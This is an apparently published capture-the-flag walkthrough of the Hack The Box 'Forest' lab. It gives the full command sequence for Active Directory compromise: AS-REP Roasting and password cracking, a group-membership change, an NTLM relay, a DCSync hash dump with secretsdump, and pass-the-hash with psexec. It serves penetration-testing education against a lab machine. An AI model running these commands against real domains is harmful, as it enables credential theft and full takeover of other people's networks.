5. Hack The Box Level Easy: Passing Forest. AS-REP Roasting

9 December 2024 8 minutes Author: Lady Liberty

This article covers key hacking techniques used during the Hack The Box “Forest” lab, including AS-REP Roasting, DCSync, and Pass-The-Hash attacks. These techniques are important steps in pentesting and can be used to attack Windows network services.

Step-by-step guide to penetrating “Forest”

Continued publication of solutions submitted for development on machines from the HackTheBox platform, including the Pass-The-Hash attack. Labs are performed over a VPN connection. It is recommended to avoid connecting from work devices or computers where important data is stored, as the login is made to a private network that includes users with deep knowledge in the field of information security.

Recon

This machine has an IP address of 10.10.10.161, which is added to the /etc/hosts file in the format:

10.10.10.161 forest.htb

First, a scan of open ports is performed. Since a full scan of all ports with nmap can be time-consuming, the process begins with a scan with masscan. This tool is used to scan all TCP and UDP ports from the tun0 interface, setting the rate to 1000 packets per second.

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.161 --rate=1000

A large number of open ports were found on the host, so we decided to check the results obtained with masscan for accuracy. To do this, an additional port scan was performed using nmap, which allowed us to clarify the status of the ports.

nmap 10.10.10.161 -p135,636,3269,49676,49665,53,593,49671,9389,49667,5985,49666,389,88,49684,464,3268,49677,47001,139,445,49714

But nmap confirmed everything. Next, we need to gather more information about the ports known to nmap.

nmap -A 10.10.10.161 -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001

The next step was to extract as much information as possible from the system. The enum4linux tool was used for this. However, the results were limited — the tool provided minimal information, such as groups, password requirements, lack of SMBv1 support, and layered resources. However, it was possible to obtain a list of users, which could be useful for further analysis.
enum4linux -a 10.10.10.161

Since the host is running Kerberos, you need to check if there is a user account that has the DONT_REQ_PREAUTH flag set in UAC. The DONT_REQ_PREAUTH flag means that this account does not require Kerberos pre-authentication.

First, you need to find out which user accounts are active. This can be done using the samrdump script included in the impacket package.

impacket-samrdump forest.htb

The script first displays all users, and then details about each of them. This way, you can see that the Administrator account is active, but the Guest account is not. Now we can list the active users.

Having a list of active users, you can check for the presence of the required flag. To do this, use the GetNPUsers script, which is part of the impacket package. During operation, the domain htb.local is specified, the IP address of the domain controller is 10.10.10.161, authentication using Kerberos (option -k), the option to check accounts without a password is used, and a list of users is also passed. This allows you to get additional information about the vulnerabilities of accounts in the domain.

GetNPUsers.py htb.local/ -dc-ip 10.10.10.161 -k -no-pass -usersfile ADUsers.txt

 

This flag is reported to be missing for all users except svc-alfresco. In the version of impacket (21-dev) that is being used, the script automatically requests the hash after the check is performed. This greatly simplifies the process of obtaining the necessary data for further vulnerability analysis of the svc-alfresco account.

Entry Point – AS-REP Roasting

The AS-REP Roasting hash has been obtained. Below is the Kerberos authentication scheme.

In the first step, the client sends a message with the user ID to the authentication server AS requesting a service on behalf of the user. The AS server creates a secret key by hashing the user’s password, which is stored in the database.

This process allows the hash to be traversed to recover the password, which is the basis of the AS-REP Roasting attack. The hash is stored in a file, and then its prototype is searched for.

john --wordlist=./rockyou.txt hashes2.txt

We find the user’s password.

USER

If we go back to the open ports, we can see that the WinRM (or Windows Remote Management) service is running, which is intended for remote management. Therefore, we can safely connect to it.

This way we take the user.

ROOT

Intelligence with BloodHound

To elevate privileges in a domain, you can use the BloodHound tool, which allows you to determine the paths for LPE (local privilege escalation).

Evil-winrm provides the ability to both upload files to and download files from the target host. To collect information, the SharpHound module, which is part of the BloodHound toolkit, was loaded onto the host.

Evil-winrm also allows you to run PowerShell scripts. During the operation, you can specify user credentials, password, and specify what information you want to get — for example, complete information about available objects, services, or privileges on the system.

After executing the script, a zip archive will appear in the current directory. We download it from the host.

Next, we will launch the neo4j graph DBMS, which BloodHound works with.

neo4j console

Now let’s launch BloodHound. We will be greeted by a blank screen.

The downloaded archive is simply transferred to the program. After that, the transition is made to the Queries tab for further analysis of the received data.

After that, a query is specified to find the shortest paths to the domain administrators. BloodHound automatically creates a graph that displays the sequential path of advancement. By clicking on each node in the graph, you can get detailed information about it and its connections in the network.

It has been determined that to further elevate privileges, you must become a member of the Exchange Windows Permissions group, as the account belongs to the Service Accounts privileged group. After doing so, you can perform actions to elevate access on the system.

net user svc-alfresco

The user is not currently a member of the Exchange Windows Permissions group. You must add them to this group to continue. After you complete this action, you can verify that the user was successfully added by viewing the list of their groups.

Add-ADGroupMember "Exchange Windows Permissions" svc-alfresco

The user has been successfully added to the Exchange Windows Permissions group. This group has the WriteDACL (Change Access Control Lists) permission on the Domain object in Active Directory. This allows members of the group to modify domain privileges, including granting permissions to perform DCSync operations that allow access to user data, such as password hashes, in the domain database.

DCSync

The DCSync attack exploits the Active Directory replication mechanism, which synchronizes changes made on one domain controller with others. Once the necessary permissions are obtained, a replication request can be initiated to extract data stored in Active Directory, including user password hashes.

This allows Active Directory account password hashes to be synchronized, after which it is possible to authenticate under their names to any service that uses the NTLM (Microsoft’s network authentication protocol) or Kerberos protocols.

The attack uses the privexchange.py and ntlmrelayx.py tools, which are part of the impacket package. First, ntlmrelayx.py is run in LDAP relay mode to the domain controller using the svc-alfresco account. This allows it to redirect authentication requests to achieve the attack goals.

ntlmrelayx.py -t ldap://htb.local --escalate-user svc-alfresco

All services are running and waiting to be connected. Now we use privex.

python privexchange.py 10.10.10.161 -ah наш_ip -d htb.local -u svc-alfresco -p s3rvice

Many errors occurred during the command execution. After a short analysis, it was decided not to fix them manually. Alternatively, you can use a browser: follow the specified link and perform HTTP authentication using the svc-alfresco credentials. The ntlmrelayx window will display connection information, which will allow you to continue the attack or obtain the necessary data.

Now let’s perform a DCSync attack using secretsdump.

secretsdump.py htb.local/svc-alfresco:[email protected] -just-dc

Great. We were able to replicate all accounts.

Pass-the-hash attack

This attack allows an attacker to gain access to a remote server where authentication is performed using the NTLM or LM protocols. In systems that use NTLM, passwords are not transmitted in the clear; instead, a challenge-response scheme is used during the authentication phase, where password hashes are transmitted.

In Windows, applications receive a password in the clear from the user and then call an API, such as LsaLogonUser, to convert the password into LM and NTLM hashes, which are used for authentication. Analysis of the protocol shows that only the password hash is sufficient for authorization, without the need to know it in the clear.

A weakness in the protocol implementation is that the hashes are transmitted without a salt, so they remain constant between sessions until the user changes the password. For the attacker, this means that the hash is equivalent to the password itself.

The attack will use the psexec tool, which allows access and execution of commands on the remote server using the obtained password hash.

psexec.py -hashes :32693b11e6aa90eb43d32c72a07ceea6 [email protected]

We have systems with full rights, which allows you to perform any operations on a remote server, including changing configurations, managing user accounts, and viewing confidential data.

Other related articles
Found an error?
If you find an error, take a screenshot and send it to the bot.